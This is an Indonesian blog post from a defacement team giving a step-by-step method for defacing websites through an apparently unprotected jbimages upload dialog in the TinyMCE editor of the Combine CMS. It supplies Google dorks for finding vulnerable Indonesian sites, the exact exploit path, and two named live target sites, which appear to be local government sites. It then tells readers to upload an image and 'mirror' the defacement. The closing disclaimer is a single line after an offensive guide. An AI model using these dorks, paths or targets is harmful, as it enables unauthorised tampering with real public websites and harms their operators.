Naufal Ardhani - Hello, kali ini saya akan membagikan Artikel Deface Jbimages TinyMCE Combine 3.04 Vulnerability, method ini banyak sekali target web indonesia akan tetapi sesuai dengan judul method ini hanya bisa upload gambar.
|~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~|
|+~+~+~+~+~+~+~+~+~+~+~+~+~+~~++~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+|
[+]Exploit Title: Jbimages TinyMCE Combine 3.04 Vulnerability
[+]Vendor: http://combine.or.id/
[+]Author: ./E4OXY
[+]Team: Garuda Tersakti 72
[+]Goolge Dork:
[~]"index of jbimages/ site:id"
[~]"intext:Powered By combine.or.id"
[+]Exploit:
[~]/assets/tiny_mce/plugins/jbimages/dialog-v4.htm
[+]Tested on: Mac os X
[+]Live Target:
[~]sendangadi-sleman.sid.web.id
[~] www.kelurahan-kampungbaru.info
|~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~|
|+~+~+~+~+~+~+~+~+~+~+~+~+~+~~++~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+|
[+]Step
[1]Dorking, pilih salah satu web.
[2]Kasih Exploit, setelah di kasih tampilan akan berubah.
[3]Lalu upload gambar dengan ext : png/jpg, kalau succes akan muncul tulisan "Upload Complete"
[4]Untuk Melihat Hasil Upload.
[~]www.site.com/assets/images/name.jpg
[~]www.site.com/assets/images/Your_image.png
[5]Mirrorin deh :)
Screenshot :
[+]Greetz :
[~] [ TN72 ] [ ./GH05TW1BL3 ] [ DarkOct02 ] [ xCy4n ] [ M1NT_1X ] [ Cy#b3r0ne ]
[ Sese15 ] [ Yukki666 ] [ ./CE.19 ]
[~]Jangan gunakan untuk kesalahan!
